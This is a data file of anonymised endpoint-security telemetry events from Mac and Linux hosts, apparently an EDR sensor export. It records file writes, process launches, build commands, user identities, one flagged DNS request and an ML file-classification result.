-{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"208.31.216.39","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"} -{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"208.188.8.87","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"} -{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"208.165.30.176","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"208.27.233.142","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"208.69.76.234","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"208.203.151.21","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"208.141.219.156","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"} -{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"208.233.54.217","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"208.24.60.146","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-0234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"208.131.106.21","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"208.27.17.203","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"208.203.151.21","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" -daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"FeatureVector":"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f69400392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"208.237.139.168","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"208.114.159.32","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} -{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"208.15.11.8","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} -{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 